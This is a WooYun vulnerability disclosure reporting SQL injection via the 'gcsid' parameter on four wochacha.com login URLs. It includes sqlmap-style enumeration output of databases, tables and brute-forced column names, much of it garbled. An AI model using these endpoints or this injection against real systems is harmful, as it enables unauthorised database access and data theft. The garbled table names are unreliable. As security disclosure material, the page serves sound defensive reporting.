当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132374

漏洞标题:我查查某站多处SQL注入打包提交(涉及8库)

相关厂商:wochacha.com

漏洞作者: 路人甲

提交时间:2015-08-07 16:47

修复时间:2015-08-12 16:48

公开时间:2015-08-12 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-07: 细节已通知厂商并且等待厂商处理中
2015-08-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://wap.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60


http://wphone.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60


http://symbian.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60


http://android.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60


不同站点,gcsid存在注入

available databases [8]:
[*] `\t`
[*] `\x02`
[*] `\x02A`
`*] `gcore
[*] gcoreinc
[*] information_schema
[*] mysql
[*] securi

漏洞证明:

Database: gcore
[3 tables]
+----------------------------------------+
| ! |
| ) |
| \x02 |
+----------------------------------------+
Database: gcoreinc
[1 table]
+----------------------------------------+
| aow_ad i: |
+----------------------------------------+
Database: information_schema
[28 tables]
+----------------------------------------+
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| PLUGIMS |
| POUTINES |
| PROCESSLIST |
| SESSION_SYATUS |
| SESSION_VzRIABLES |
| STATISTICS |
| TABLE_CONSTRAINTS |
| TABLE_CRIVILEHES |
| TABLrSC |
| TRIGGERSA |
| VIEaS |
| ?E&HCOLDJDVUSAGE |
| CFLLATIA
| CHAACTER?QAEJ |
| COLJAR=OJ_CARACTER_SET_ALML40AB=LITY |
| GLBAANABDE> |
| GLOBALRQU |
| P>9SDIOLS |
| PROBHIA |
| RFEB )) |
| SCHEMA\x07\\?fd\\?ce\\?9a\\?ae\x08\x05 |
| SCHEMAuP\\?ff\x0cIVILEGES\x19 |
| qSER\x02\x18\x0ePRIVILEGES |
+----------------------------------------+
Database: mysql
[23 tables]
+----------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------+


+--------------------------+
| e-mail |
| abfrsql |
| account |
| address_book_id |
| admin_psw |
| administrateur |
| adminname |
| adress |
| after |
| aide |
| akses |
| allno |
| allow |
| allowmodpost |
| answer_id |
| articleid |
| assigned_to |
| attachment |
| avatar |
| backlink |
| ban_id |
| basename |
| benutzer |
| blog_id |
| blogid |
| bp_id |
| bs_bid |
| bsm_id |
| c_commu_topic_id |
| cache_id |
| callstart |
| can_codice |
| candidato |
| cel |
| city |
| classid |
| clave |
| clients |
| cmtid |
| cod |
| cod_utente_mod |
| cognome |
| com |
| complet |
| confirm_id |
| consumidor |
| content |
| coupon |
| creditcard |
| cronid |
| cvvc |
| data_out |
| desd_xdecisao |
| dis_codigo |
| documento_id |
| eid |
| en |
| enugene |
| event_id |
| export_id |
| family |
| feed |
| feedid |
| file_id |
| fkidanagrafica |
| forumid |
| gap_codigo |
| gifi_accno |
| glmm |
| groupe |
| guy |
| header |
| hid |
| hidden_url |
| how |
| id_poll |
| id_product |
| id_tra |
| idapparlocom |
| idcapo |
| idcategoria |
| idcuore |
| idesameobiettivo |
| idevent |
| idgrouppermission |
| idkontakt |
| idreparto |
| idsmaglog |
| idstatocivile |
| idstelle |
| idsubscriptiontickets |
| idtipologiaricovero |
| imenu |
| include_date |
| institute_id |
| invisible |
| it_id |
| kat_id |
| key_id |
| kod |
| kode |
| kontakt |
| konto |
| kontr620 |
| kre1 |
| kunci |
| lahir |
| langid |
| loadmodule |
| location_id |
| login |
| login_admin |
| login_user |
| loginpas |
| loginpasswd |
| logins |
| mailid |
| manufacturer |
| matcode |
| mima |
| mod_custom |
| mod_mainmenu |
| mod_vm_cat_menu_specific |
| mopc |
| mossef |
| mosvote |
| mot_de_passe_bdd |
| n_dept |
| n_id |
| nama |
| namaakun |
| nazwisko |
| newsfeeds |
| nickname |
| nonnavigable |
| nowy |
| ns |
| object_link_a_id |
| ord_id |
| orderid |
| parole |
| part |
| paswd |
| pasword |
| platformid |
| pmid |
| po_id |
| polloptionid |
| pomoc |
| portachiavin |
| post_id |
| postdatetime |
| poster |
| prazo_xevento |
| prc_sconto1 |
| privmsgs_id |
| problem_code |
| prodid |
| product_list |
| productid |
| q_trid |
| readperm |
| reason |
| recommend_product_id |
| relid |
| sb_admin_name |
| schedaid |
| schet |
| schl |
| searchbot |
| searchstring |
| sessionid |
| skype |
| sql_text |
| standard |
| startnummer |
| state_id |
| struct_id |
| sub_comment4 |
| sub_image3 |
| sub_title4 |
| summaprihod |
| summary_id |
| sysuser |
| tags |
| taskid |
| templateid |
| texte |
| threadorder |
| timeid |
| title_id |
| tmp_lahir |
| user_group |
| user_login |
| user_username |
| users |
| uwierzytelnienia |
| vinod |
| vm_manufacturer |
| vorlnr |
| website |
| whabfragen |
| who |
| word_id |
| wuser |
| xgrupo |
| xprognostico |
| xrelatorio |
+--------------------------+


wooyun.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-12 16:48

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无